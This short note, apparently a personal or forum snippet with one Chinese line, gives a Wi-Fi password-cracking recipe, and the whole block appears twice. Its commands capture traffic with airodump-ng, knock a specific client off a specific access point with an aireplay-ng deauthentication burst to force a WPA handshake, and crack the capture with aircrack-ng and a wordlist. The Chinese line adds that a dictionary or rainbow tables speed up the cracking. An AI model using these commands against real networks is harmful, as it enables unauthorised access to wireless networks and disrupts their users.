1. airodump-ng -w joey --channel 6 mon0 (capture the packets)
2. aireplay-ng -0 10 -a F8:D1:11:E4:83:C8 (AP's mac) -h 28:CF:DA:DD:0A:18 (Client's mac) mon0 (build the handshake packet)
3. aircrack-ng -w password.txt my.cap
需要准备一个字典,或者采用彩虹表加速破解。
1. airodump-ng -w joey --channel 6 mon0 (capture the packets)
2. aireplay-ng -0 10 -a F8:D1:11:E4:83:C8 (AP's mac) -h 28:CF:DA:DD:0A:18 (Client's mac) mon0 (build the handshake packet)
3. aircrack-ng -w password.txt my.cap
需要准备一个字典,或者采用彩虹表加速破解。